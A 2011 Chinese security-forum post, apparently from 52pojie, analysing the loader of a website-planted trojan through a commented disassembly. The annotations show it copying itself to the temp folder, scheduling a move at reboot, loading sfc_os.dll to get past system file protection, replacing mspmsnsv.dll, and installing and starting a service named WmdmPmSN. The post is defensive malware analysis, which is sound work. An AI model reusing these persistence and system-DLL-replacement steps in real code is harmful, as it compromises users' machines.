好友
阅读权限40
听众
最后登录1970-1-1
|
是昔流芳
发表于 2011-2-14 18:57
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 是昔流芳 于 2011-2-14 18:58 编辑
今天手贱,看到个网站被挂马了,于是就把网马下载下来捏一捏.一开始分析的时候还挺怡然,分析到生成的DLL时就有些烦躁了.一看时间戳,09年11月的.运气真不是一般的好.把EXE部分的分析发上来吧,不多,半成品,勿笑.得赶作业去了......Loader部分分析
004012B2 /$ 55 push ebp
004012B3 |. 8BEC mov ebp, esp
004012B5 |. 81EC 1C070000 sub esp, 71C
004012BB |. 80A5 ECFAFFFF>and byte ptr [ebp-514], 0
004012C2 |. 53 push ebx
004012C3 |. 56 push esi
004012C4 |. 57 push edi
004012C5 |. 6A 40 push 40
004012C7 |. 33C0 xor eax, eax
004012C9 |. 59 pop ecx
004012CA |. 8DBD EDFAFFFF lea edi, dword ptr [ebp-513]
004012D0 |. F3:AB rep stos dword ptr es:[edi]
004012D2 |. 80A5 F0FBFFFF>and byte ptr [ebp-410], 0
004012D9 |. 6A 40 push 40
004012DB |. 66:AB stos word ptr es:[edi]
004012DD |. AA stos byte ptr es:[edi]
004012DE |. 59 pop ecx
004012DF |. 33C0 xor eax, eax
004012E1 |. 8DBD F1FBFFFF lea edi, dword ptr [ebp-40F]
004012E7 |. 80A5 F8FDFFFF>and byte ptr [ebp-208], 0
004012EE |. F3:AB rep stos dword ptr es:[edi]
004012F0 |. 66:AB stos word ptr es:[edi]
004012F2 |. AA stos byte ptr es:[edi]
004012F3 |. 6A 40 push 40
004012F5 |. 33C0 xor eax, eax
004012F7 |. 59 pop ecx
004012F8 |. 8DBD F9FDFFFF lea edi, dword ptr [ebp-207]
004012FE |. F3:AB rep stos dword ptr es:[edi]
00401300 |. 66:AB stos word ptr es:[edi]
00401302 |. AA stos byte ptr es:[edi]
00401303 |. 8D85 F0FBFFFF lea eax, dword ptr [ebp-410]
00401309 |. BE 04010000 mov esi, 104
0040130E |. 50 push eax ; /Buffer
0040130F |. 56 push esi ; |BufSize => 104 (260.)
00401310 |. FF15 54204000 call dword ptr [<&KERNEL32.GetTempPat>; \取系统临时文件夹目录
00401316 |. FF15 50204000 call dword ptr [<&KERNEL32.GetTickCou>; [GetTickCount
0040131C |. 50 push eax ; /<%d>
0040131D |. 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] ; |
00401323 |. 50 push eax ; |<%s>
00401324 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208] ; |
0040132A |. 68 5C5A4000 push 00405A5C ; |format = "%s%d.dat"
0040132F |. 50 push eax ; |s
00401330 |. FF15 70204000 call dword ptr [<&MSVCRT.sprintf>] ; \格式化字符串输出
00401336 |. 83C4 10 add esp, 10
00401339 |. 8D85 ECFAFFFF lea eax, dword ptr [ebp-514]
0040133F |. 56 push esi ; /BufSize
00401340 |. 50 push eax ; |PathBuffer
00401341 |. 6A 00 push 0 ; |hModule = NULL
00401343 |. FF15 4C204000 call dword ptr [<&KERNEL32.GetModuleF>; \获取自身目录
00401349 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
0040134F |. 50 push eax ; /NewName
00401350 |. 8D85 ECFAFFFF lea eax, dword ptr [ebp-514] ; |
00401356 |. 50 push eax ; |ExistingName
00401357 |. FF15 48204000 call dword ptr [<&KERNEL32.MoveFileA>>; \将自身复制到系统临时目录,重命名为1634560.dat
0040135D |. 85C0 test eax, eax
0040135F |. 74 11 je short 00401372 ; 若复制成功,跳走
00401361 |. 6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
00401363 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208] ; |
00401369 |. 6A 00 push 0 ; |NewName = NULL
0040136B |. 50 push eax ; |ExistingName
0040136C |. FF15 44204000 call dword ptr [<&KERNEL32.MoveFileEx>; \重启后复制自身
00401372 |> \BB 245A4000 mov ebx, 00405A24 ; ASCII "WmdmPmsn"
00401377 |. 6A 08 push 8
00401379 |. 53 push ebx
0040137A |. E8 81FCFFFF call 00401000
0040137F |. 6A 0C push 0C
00401381 |. 68 145A4000 push 00405A14 ; ASCII "ADVAPI32.dll"
00401386 |. E8 75FCFFFF call 00401000
0040138B |. 80A5 FCFEFFFF>and byte ptr [ebp-104], 0
00401392 |. 83C4 10 add esp, 10
00401395 |. 33C0 xor eax, eax
00401397 |. 8DBD FDFEFFFF lea edi, dword ptr [ebp-103]
0040139D |. 6A 40 push 40
0040139F |. 80A5 F4FCFFFF>and byte ptr [ebp-30C], 0
004013A6 |. 59 pop ecx
004013A7 |. 80A5 E8F9FFFF>and byte ptr [ebp-618], 0
004013AE |. F3:AB rep stos dword ptr es:[edi]
004013B0 |. 66:AB stos word ptr es:[edi]
004013B2 |. AA stos byte ptr es:[edi]
004013B3 |. 6A 40 push 40
004013B5 |. 33C0 xor eax, eax
004013B7 |. 59 pop ecx
004013B8 |. 8DBD F5FCFFFF lea edi, dword ptr [ebp-30B]
004013BE |. F3:AB rep stos dword ptr es:[edi]
004013C0 |. 66:AB stos word ptr es:[edi]
004013C2 |. AA stos byte ptr es:[edi]
004013C3 |. 6A 40 push 40
004013C5 |. 33C0 xor eax, eax
004013C7 |. 59 pop ecx
004013C8 |. 8DBD E9F9FFFF lea edi, dword ptr [ebp-617]
004013CE |. F3:AB rep stos dword ptr es:[edi]
004013D0 |. 66:AB stos word ptr es:[edi]
004013D2 |. AA stos byte ptr es:[edi]
004013D3 |. 8B3D 40204000 mov edi, dword ptr [<&KERNEL32.GetSy>; kernel32.GetSystemDirectoryA
004013D9 |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
004013DF |. 56 push esi ; /BufSize
004013E0 |. 50 push eax ; |Buffer
004013E1 |. FFD7 call edi ; \取系统目录
004013E3 |. 8D85 E8F9FFFF lea eax, dword ptr [ebp-618]
004013E9 |. 56 push esi ; /BufSize
004013EA |. 50 push eax ; |Buffer
004013EB |. FFD7 call edi ; \GetSystemDirectoryA
004013ED |. 8D85 E4F8FFFF lea eax, dword ptr [ebp-71C]
004013F3 |. 56 push esi ; /BufSize
004013F4 |. 50 push eax ; |Buffer
004013F5 |. FFD7 call edi ; \GetSystemDirectoryA
004013F7 |. 8D85 E4F8FFFF lea eax, dword ptr [ebp-71C]
004013FD |. 68 4C5A4000 push 00405A4C ; /src = "\notepad.exe"
00401402 |. 50 push eax ; |dest
00401403 |. E8 BE000000 call <jmp.&MSVCRT.strcat> ; \连接字符串%SystemRoot%\system32\notepad.exe
00401408 |. 59 pop ecx
00401409 |. 8D85 F4FCFFFF lea eax, dword ptr [ebp-30C]
0040140F |. 59 pop ecx
00401410 |. 56 push esi
00401411 |. 50 push eax
00401412 |. FFD7 call edi ; 取系统目录
00401414 |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
0040141A |. 68 3C5A4000 push 00405A3C ; /src = "\mspmsnsv.dll"
0040141F |. 50 push eax ; |dest
00401420 |. E8 A1000000 call <jmp.&MSVCRT.strcat> ; \连接字符串%SystemRoot%\system32\mspmsnsv.dll
00401425 |. 8D85 F4FCFFFF lea eax, dword ptr [ebp-30C]
0040142B |. 68 305A4000 push 00405A30 ; /src = "\Thumbes.db"
00401430 |. 50 push eax ; |dest
00401431 |. E8 90000000 call <jmp.&MSVCRT.strcat> ; \连接字符串%SystemRoot%\system32\Thumbes.db
00401436 |. 53 push ebx
00401437 |. E8 52FDFFFF call 0040118E ; 打开服务控制管理器
0040143C |. 83C4 14 add esp, 14
0040143F |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms
00401444 |. FF15 3C204000 call dword ptr [<&KERNEL32.Sleep>] ; \暂停1s
0040144A |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
00401450 |. 50 push eax
00401451 |. E8 ECFBFFFF call 00401042 ; 进行字串处理,加载sfc_os.dll并调取5号资源
00401456 |. 59 pop ecx
00401457 |. 8D85 F4FCFFFF lea eax, dword ptr [ebp-30C]
0040145D |. 50 push eax ; /NewName
0040145E |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104] ; |
00401464 |. 50 push eax ; |ExistingName
00401465 |. FF15 48204000 call dword ptr [<&KERNEL32.MoveFileA>>; \将mspmsnsv.dll复制为Thumbes.db进行备份
0040146B |. FF35 00304000 push dword ptr [403000]
00401471 |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
00401477 |. 68 04304000 push 00403004
0040147C |. 50 push eax
0040147D |. E8 D8FDFFFF call 0040125A ; 调用CreatrFile替换mspmsnsv.dll
00401482 |. 8D85 E4F8FFFF lea eax, dword ptr [ebp-71C]
00401488 |. 50 push eax
00401489 |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
0040148F |. 50 push eax
00401490 |. E8 2DFCFFFF call 004010C2 ; 打开mspmsnsv.dll和notepad.exe
00401495 |. 53 push ebx
00401495 |. 53 push ebx
00401496 |. E8 74FDFFFF call 0040120F ; 创建服务WmdmPmSN,设为启动状态
0040149B |. 53 push ebx
0040149C |. E8 32FDFFFF call 004011D3 ; 启动服务WmdmPmSN
004014A1 |. 83C4 1C add esp, 1C
004014A4 |. 5F pop edi
004014A5 |. 5E pop esi
004014A6 |. 5B pop ebx
004014A7 |. C9 leave
004014A8 \. C3 retn
|
|
发表于 2011-2-14 19:10
发表于 2011-2-14 19:59
